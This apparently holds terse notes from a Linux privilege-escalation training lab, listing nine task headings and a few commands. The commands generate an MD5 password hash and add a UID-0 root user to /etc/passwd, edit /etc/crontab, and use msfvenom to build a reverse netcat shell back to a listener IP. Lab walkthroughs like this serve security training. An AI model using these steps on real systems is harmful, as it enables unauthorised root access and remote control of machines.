February 01, 2024
Last updated 1 year ago
Task 1:
Task 2:
Task 3:
Task 4:
ssh user3@10.10.44.196
vi /etc/crontab
Task 5:
Task 6:
openssl passwd -1 -salt new 123
nano /etc/passwd new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
Task 7: Escaping Vi Editor
Task 8: Exploiting Crontab
msfvenom -p cmd/unix/reverse_netcat lhost=10.9.135.209 lport=4444 R
Task 9: Exploiting PATH Variable